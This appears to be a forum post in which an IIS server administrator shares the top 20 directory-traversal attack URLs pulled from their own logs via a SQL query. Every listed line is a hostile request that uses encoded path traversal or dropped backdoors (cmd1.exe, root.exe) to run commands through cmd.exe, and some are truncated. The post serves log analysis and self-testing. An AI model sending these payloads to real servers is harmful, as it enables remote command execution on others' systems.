I store all of my IIS server logs in SQL tables. This has the benefit of being able to run SQL queries against log data. So for my general amusement I created a top 20 query of directory traversals.
Sort of like 'america's dumbers hackers'(j/k btw - most of them are UK based)
So here, for your viewing pleasure, is the list of the top 20 directory traversal style attacks against my box. If you run M$ IIS it's worth testing these against _YOUR_OWN_ box.
Don't test them on my servers because I will write a stern letter to your ISP (see here ) <manical_laugh>heh</manical_laugh>.
http://127.0.0.1/winnt/system32/cmd.exe?/c+dir
http://127.0.0.1/scripts/..%5c%5c../...cmd.exe?/c+dir
http://127.0.0.1/scripts/..%5c..%5cw...cmd.exe?/c+dir
http://127.0.0.1/scripts/..%5c../win...cmd.exe?/c+dir
http://127.0.0.1/_vti_bin/..%5c..%5c...cmd.exe?/c+dir
http://127.0.0.1/_vti_bin/..%5c..%5c...cmd.exe?/c+dir
http://127.0.0.1/adsamples/cmd1.exe?/c+dir
http://127.0.0.1/cgi-bin/cmd1.exe?/c+dir
http://127.0.0.1/cmd1.exe?/c+dir
http://127.0.0.1/iisadmpwd/cmd1.exe?/c+dir
http://127.0.0.1/iissamples/cmd1.exe?/c+dir
http://127.0.0.1/iissamples/root.exe?/c+dir
http://127.0.0.1/images/cmd1.exe?/c+dir
http://127.0.0.1/msadc/..%5c..%5c..%...cmd.exe?/c+dir
http://127.0.0.1/samples/cmd1.exe?/c+dir
http://127.0.0.1/scripts/..%2e..%2ew...cmd.exe?/c+dir
http://127.0.0.1/scripts/..%5c../..%...cmd.exe?/c+dir
http://127.0.0.1/scripts/..Á ..Á ....cmd.exe?/c+dir
http://127.0.0.1/scripts/..À%qf../w...cmd.exe?/c+dir
http://127.0.0.1/scripts/cmd1.exe?/c+dir
(20 row(s) affected)
Reply With Quote